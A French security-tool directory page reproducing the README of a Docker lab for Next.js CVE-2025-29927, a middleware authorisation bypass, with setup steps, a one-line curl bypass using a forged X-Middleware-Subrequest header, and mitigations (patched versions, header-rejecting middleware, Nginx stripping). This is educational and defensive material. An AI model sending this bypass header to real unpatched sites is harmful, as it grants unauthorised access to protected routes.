Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — Laboratoire basé sur Docker pour explorer et reproduire la vulnérabilité de contournement d'autorisation du middleware CVE-2025-29927 de Next.js. Comprend une application vulnérable, des étapes de reproduction et des stratégies d'atténuation pour la recherche en sécurité éducative. | Kitploit
Outils/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
Authentification et AutorisationAnalyse des VulnérabilitésExploitation d'Applications WebMauvaise ConfigurationApprentissage et ÉducationLabs et Pratique
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
5il y a 7 moisPas encore vérifié

À propos

Laboratoire basé sur Docker pour explorer et reproduire la vulnérabilité de contournement d'autorisation du middleware CVE-2025-29927 de Next.js. Comprend une application vulnérable, des étapes de reproduction et des stratégies d'atténuation pour la recherche en sécurité éducative.

Partager

🚨 NextJS-CVE-2025-29927-Docker-Lab

Ce dépôt contient un environnement de laboratoire basé sur Docker pour explorer et démontrer la vulnérabilité Next.js CVE-2025-29927 dans un cadre contrôlé.

⚠️ AVERTISSEMENT : Ce laboratoire est destiné uniquement à des fins éducatives et de recherche en sécurité. Ne l'exposez pas sur l'internet public et ne l'utilisez pas en production.


📦 Fonctionnalités

  • ✅ Application Next.js vulnérable
  • ✅ Conteneurisée avec Docker
  • ✅ Conçue pour des tests locaux de CVE-2025-29927
  • ✅ Inclut des routes et une UI pré-configurées
  • ✅ Facile à configurer et à exécuter

🛠 Prérequis

Assurez-vous d'avoir installé les éléments suivants :

  • Docker (v20+)
  • Git
  • Optionnel : Node.js si vous prévoyez de l'exécuter en dehors de Docker

🚀 Pour commencer

Suivez ces étapes pour cloner et exécuter le laboratoire :

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. Construire et exécuter avec Docker

root@kitploit:~
docker-compose up --build

Cela va :

  • Construire l'image Docker
  • Démarrer le serveur Next.js vulnérable
  • Exposer l'application sur http://localhost:3000

📂 Structure des dossiers

root@kitploit:~
.
├── app/                     # Code principal de l'application Next.js
├── public/                  # Ressources statiques (images, etc.)
├── Dockerfile               # Configuration Docker pour l'application
├── docker-compose.yml       # Configuration de Compose
├── .env                     # Variables d'environnement (le cas échéant)
├── README.md                # Vous êtes ici

🧪 Test de la vulnérabilité

🛡️ CVE-2025-29927 - Contournement d'autorisation du middleware Next.js

⚠️ AVERTISSEMENT : Cette documentation est destinée uniquement à des fins éducatives et de recherche en sécurité. Ne déployez pas l'application vulnérable dans un environnement de production.


🔍 Aperçu

CVE-2025-29927 est une vulnérabilité critique de contournement d'autorisation dans le middleware Next.js. Elle permet aux attaquants de sauter l'authentification basée sur le middleware et d'accéder aux routes protégées en manipulant l'en-tête X-Middleware-Subrequest.


🧪 Reproduction de la vulnérabilité

1. Accès aux routes protégées sans authentification

Essayez d'accéder à une route protégée, par exemple /admin, sans aucune authentification :

root@kitploit:~
curl http://localhost:3000/admin

Comportement attendu : L'accès est refusé ou redirigé vers une page non autorisée.

Comportement vulnérable : L'accès est accordé sans authentification.

2. Contournement du middleware à l'aide de l'en-tête X-Middleware-Subrequest

Envoyez une requête avec l'en-tête X-Middleware-Subrequest pour contourner les vérifications du middleware :

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

Résultat : Le middleware est contourné et l'accès à la route protégée est accordé.


🛡️ Stratégies d'atténuation

1. Mettre à jour Next.js vers une version corrigée

Mettez à jour Next.js vers l'une des versions suivantes où la vulnérabilité est corrigée :

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. Mettre en œuvre un durcissement du middleware

Améliorez votre middleware pour valider correctement les requêtes et rejeter toute requête avec des en-têtes suspects :

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}

3. Configurer le proxy inverse pour supprimer les en-têtes suspects

Si vous utilisez un proxy inverse (par exemple, Nginx), configurez-le pour supprimer l'en-tête X-Middleware-Subrequest des requêtes entrantes :

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 Références

  • NVD - CVE-2025-29927
  • Datadog Security Labs Analysis
  • Vercel Postmortem

Ce fichier VULNERABILITY.md fournit un guide complet pour comprendre et reproduire la vulnérabilité CVE-2025-29927 dans un environnement contrôlé. Il propose également des stratégies d'atténuation pratiques pour sécuriser vos applications Next.js contre de telles exploitations.

Pour une démonstration détaillée et des informations supplémentaires sur cette vulnérabilité, vous pouvez vous référer à la démonstration complète d'attaque fournie par Techtalkpine sur l'article de blog qui est également lié à la démonstration en direct Youtube : https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

Faites-moi savoir si vous avez besoin d'aide pour une partie spécifique de cette configuration ou de clarifications supplémentaires sur les étapes d'atténuation.


🧹 Démontage

Pour arrêter et supprimer les conteneurs :

root@kitploit:~
docker-compose down

📚 Ressources

  • Documentation Next.js
  • Documentation Docker
  • OWASP Top 10

⚠️ Clause de non-responsabilité légale

Ce projet est destiné uniquement à des fins éducatives et de recherche. Vous êtes responsable de son utilisation conformément à toutes les lois et directives éthiques applicables. L'auteur n'est pas responsable de toute mauvaise utilisation ou dommage causé.

Télécharger l’outil